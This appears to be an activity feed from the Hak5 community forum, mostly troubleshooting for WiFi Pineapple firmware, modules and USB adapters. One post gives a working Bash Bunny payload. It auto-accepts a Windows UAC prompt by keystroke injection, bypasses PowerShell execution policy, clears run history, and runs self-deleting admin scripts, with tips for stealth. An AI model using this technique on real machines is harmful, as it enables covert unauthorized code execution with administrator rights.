All Activity

This stream auto-updates     

1. Past hour
  2. Also you can directly contact Hack5 by this email ( support@hakshop.zendesk.com ) And report your issue to make a solution in new coming firmware
  3. You have to install this firmware first (nano_factory.bin) you can find it in this site https://docs.hak5.org/hc/en-us/articles/360010471774-Firmware-Recovery And check out your pineapple if it work normaly you can after that upgrade it to this firmware (2.5.4) which is the last firmware most module work with such as site survey module However all of us waiting the new firmware which maybe solve all the issue
  4. Try to do a firmware recovery first: https://docs.hak5.org/hc/en-us/articles/360010471774-Firmware-Recovery This will take you to version 2.4.1. Do the initial setup and see how the core modules included work. If you want to go further than that do a manual upgrade to version 2.5.4 following this process: https://docs.hak5.org/hc/en-us/articles/360025819673-Manual-Firmware-Installation Be sure to reformat your SD card as well before starting so no old data on the card causes issues (this has been reported to happen with other users). If you are on a 2.6.x firmware version then you will have issues with modules as most are waiting on updates to be compatible with the latest firmware. This is due to the update from OpenWRT 15.x to 19.x in firmware 2.6.x requiring updates to stay work.
  5. Today
  6. If it is working the way you want I wouldn't upgrade anything until confirmed working module releases are done. You will run the risk of some modules not working if updates have been done since your last install.
  7. Thanks for reporting this, I'll release an update as soon as possible with the fix.
  8. @Foxtrot has said in previous posts that he is working on updating the modules to work with 2.6.x as time allows. Since these are community modules hopefully some creators update there modules as well to make the process go faster. If you are wanting a certain module to work try downgrading to firmware recovery version. Also some users report 2.5.4 working with certain modules as well. This is the best fix to get a module working until the updated modules are released.
  9. Looks like from the dmesg its not a driver issue for the adapter. Something is going wrong with either the USB interface on the system or alfa adapter is bad. Will other USB devices work from the same USB 3.0 port you have tried on the system? If no - system is having USB issues If yes - seems your alfa adapter is bad
  10. I’m a total noob.... but I imagine that if your story was true, then someone with that background wouldn’t need to ask those questions on here🤔 An they probably wouldn’t call themselves cybermaster...
  11. of the comparsion to apple is nonsensical dude cause release is new
  12. So after updating the firmware, the nano FINALLY saw the usb micro and was able to format it and I actually loaded a few modules onto it - then after shutting down & rebooting, it stopped showing the usb and would not load modules - I never even touched the dang thing :) so I'm not sure if its me or the device?
  13. Sorry for a double post, here's the dmesg: https://pastebin.com/T0Cg6SpW
  14. Hello all, I'm working on a project that requires multiple programs to run in parallel and when started individually each one triggers a UAC window. After some tinkering I came to the following solution and wanted to pass it along. Hope it helps. It starts with modifying the run.sh file in the extensions folder. I added the following code after the line "case "$os" in". This isn't strictly needed but I plan on using this in the future as well. WIN_UAC) QUACK GUI r QUACK DELAY 500 QUACK STRING "$@" QUACK CTRL-SHIFT ENTER QUACK DELAY 1000 QUACK ALT y QUACK ALT c QUACK LEFTARROW QUACK ENTER QUACK ENTER ;; I then created the BashBunny payload that would copy the file p2.ps1 from the switch# folder to the root of the USB storage and then call a quick powershell script using the new RUN WIN_UAC command that I just added. ######## INITIALIZATION ######## LED SETUP GET SWITCH_POSITION ATTACKMODE HID STORAGE cp /root/udisk/payloads/$SWITCH_POSITION/p2.ps1 /root/udisk/p2.ps1 ######## ATTACK ######## LED ATTACK Q DELAY 1000 RUN WIN_UAC "powerShell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\p1.ps1')" ######## FINISH ######## LED FINISH The RUN WIN_UAC command will run the powershell script p1.ps1 with administrator privileges. p1.ps1 will copy p2.ps1 from the root of the BashBunny storage to a temporary folder on the PC and then run p2.ps1 with admin privileges. At this time the BashBunny can be unplugged. #Setup Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue #Clear run command window Set-ExecutionPolicy bypass -force #disable UAC for this script Copy-Item ((gwmi win32_volume -f 'label=''BashBunny''').Name+'p2.ps1') -Destination $env:temp; Start-Process powershell (($env:temp)+'\p2.ps1') #Copy p2.ps1 from BashBunny storage root to temp folder on PC then run p2.ps1. P2.ps1 will run with admin privileges from the temporary folder and when it's job is complete will delete itself and end the powershell process. #Setup Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue #Clear run command window Set-ExecutionPolicy bypass -force #disable UAC for this script #Your payload here with all the privileges. Remove-Item (($env:temp)+'\p1.ps1') #Delete this script file Stop-Process -Id $PID #End this process #End ################################################################################################ To add stealthyness I would add -windowstyle hidden to the Start-Process lines as well as turn down the volume or mute before the UAC window is triggered. What do you think? Drac.
  15. Yesterday
  16. I get the same problem. I'm able to get around it by unplug/replug the Nano while wp6.sh is waiting to detect. It will come up after a few seconds and work fine after that.
  17. Hello. I tried in Debian and Windows 10. I installed atheros drivers both times, definetely didn't make a mistake. I also booted a live kali usb to check if I did something stupid. Nope, still same issue. I tried 3 different cables (yes). Still same issue. I thought this could be a PSU issue, maybe it wants more power? Then I remembered it worked on my old Lenovo T400 on a single USB 2.0 port without doing the same issue. This time I was connecting it to USB 3.0, USB 2.0 and USB 3 GEN 2 (800 mA max) and same issue every time. Tried multiple computers too. Could a dmesg log help?
  18. also learning how linux works and the programs being used by BB is very important. If you have no idea how nmap works, how are you going to do a scan to get the info needed. granted this is something that the extensions that hak5 has made help you out
  19. Hello there, Im having similar issues. This is what I posted on Discord ch. I have finally got to a point that I feel like launching my nano out the window. I have had it for a good few months and had no success in doing anything with it. I cant get it to capture handshakes on my own network or anyone elses. The network share needs set up every time I use it (windows 10 pro) The modules keep vanishing and coming back . Its now not installing any the modules dependencies. Ps can capture handshakes using alpha card and Kali . Any info and help much appreciated also running latest firmware. Cheers Kev Just and old guy trying to keep the brain working
  20. I’ve got my tetra in a bit of a sweet spot for me with version 2.5.4. If I update the modules (either/any/all of the hak5 modules or third-party), is there a good chance they’ll stop working for FW 2.5.4? Normally I don’t mind doing a full reset but at the moment, my tetras been up for 24+ days and I want to keep it going.
  21. Well said. The payloads provided are more for example. They might work "out of the box" for some scenarios but recon is required to specialize them to be fully functional most of the time. Also a lot of the payloads have not been updated for some time. As companies catch word of the vulnerabilities posed by old payloads they can try to prevent them with updates/patches fixing the vulnerabilities. This doesn't mean there aren't unpatched systems in the wild but usually leads to new/updated payloads being required. If you want to learn about the use of the bash bunny start with very simple payloads like one that opens a text editor and types something. Evaluate how it works, modify it, then move on to more complex payloads.
  22. @hoppler almost all of the payloads are developed by 3rd party developers, meaning they dont work for hak5. hak5 does not update these payloads. They provide the tools ( the Bashbunny ) for the pentester to do what they want to do with it. This means for the most part, you need to have a general knowledge of how the payload works. Myself, I have gone through different payloads and read the code and changed things to make it do what I want it to do. Also realize that these are made for a Business style attack, meaning your home machine most likely wont work for these because some ports might not be open or you dont have the required tools setup on the BB. I personally was able to acquire an old machine from where I work ( I bought it for cheap from them ) and a lot of the payloads do work and I have setup the payloads to work with that version of windows running. The BB is not just a plug and play. You need to do your research on the machine your attacking and edit the payload to that. Most people that us the BB are familiar with coding and just make there own payloads for there situation and never upload them to github because maybe they dont want to.
  23. Thanks for info. In the thread on module statuses that was recently reported as well by another user. This confirms it as well. Seems there is an issue with reaver and bully.
  24. In any case, the scan will produce results now but the WPS module will still not run. Oh well
  25. Cap_Sig, I used the recovery image as instructed and everything looks good but I cannot get the pineapple to recognize my microsd card even when it says it has successfully formatted it. Was this feature supported back then?
  26. What OS are you having this issue in? Have you tried a different OS? Have you tried another USB cable? Could be as simple as a bad pin or broke wire in the cable. Just a couple quick things to check before digging in deeper to the problem.
  27. Its a tough spot to be in. Hak5 could just never release updates for the device and the community modules continue to work without being updated, but then how would you feel if new features/improvements never got offered over the life of the device..? The biggest hope is module creators of past/present/future continue to update/improve there modules to work with the latest Hak5 firmware.
  1. Load more activity